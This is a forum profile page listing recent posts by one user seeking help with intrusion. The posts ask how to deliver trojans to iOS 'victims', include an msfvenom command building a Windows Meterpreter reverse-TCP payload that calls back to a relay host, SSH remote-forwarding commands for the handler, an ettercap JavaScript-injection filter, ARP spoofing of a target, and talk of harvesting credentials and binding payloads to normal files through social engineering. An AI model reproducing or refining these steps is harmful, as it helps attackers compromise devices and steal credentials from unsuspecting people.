Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About kdlsw

  • Rank

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. I do not have too much experience with ios. For Android, a simple social engineering to let the victim install the malware apk would be sufficient. But from my understanding, all APPs on ios are required to be installed via AppStore, if I cannot poison the traffic of the victim, what's the usual way to deliver a trojan or malware to a target? Or if there is any good articles/books I can look into? thanks!
  2. This is exactly what I was trying to do, the entire ssh thing was meant to accomplish this goal, but it did not work. If I do ssh -N -R 80:localhost:80 user@aaa.aaa.aaa.aaa on my "local" console, and run apache on my "local", I was able to access the "local" apache server by accessing aaa.aaa.aaa.aaa:80 from outside. But this trick did not work with metasploit, I mean if I run ssh -N -R 12345:localhost:12345 user@aaa.aaa.aaa.aaa and set the multi-handler to listen on local machine at 12345, while the trojan was configured to send stager or a direct shell to aaa.aaa.aaa.aaa
  3. @digip Thank you very much for replying me, I think I did not address my situation and question clearly, and it leads to some misunderstanding, I am sorry about that. I am not trying to let victims to connect to my local machine via ssh, I am trying to let them connect to one of my server via a standard meterpreter reverse tcp connection, and the server will send this connection back to my local machine, like this : Victims--------(reverse tcp)--------> my server-----------(remote SSH)--------->my local kali The reasons I am doing this are 1:
  4. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handl
  5. I found it quite difficult to actually get a shell these days, I am wondering how you guys do it, anyway, here is what I did On the LAN side, with mitm attack and injection, beef, it’s reasonably efficient to harvest credential, but a little hard to pwn a device, usually I need to send a fake social engineering request to let the victim to run some payloads. Remotely, I can bind some malicious payloads with normal files, and with a lot of social engineering, I can sometime get a shell then escalate privilege with my scripts. But these tricks (both LAN and internet) are not always reliable
  6. Thank you, this is helpful! I will try it!
  7. @digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you.
  8. I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as e
  9. Hi, I did a pentest in a LAN, some weird things happened. This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of, B is connected to A, wireless router, with a gateway of All the clients and my Kali machine are connected to B. Target has an IP of Here is what I did with Kali, I use the following to arp spoof the target and router B arpsoof -i eth0 -t arpsoof -i eth0 -t sysctl -w ne
  10. Thank you! I will take a look on them, thanks!
  11. I know it is possible to embed some malware into a web page back in those days when JDB method works. Is it possible to execute a malware on the client simply by letting it browsing a web page these days? Thanks!
  • Create New...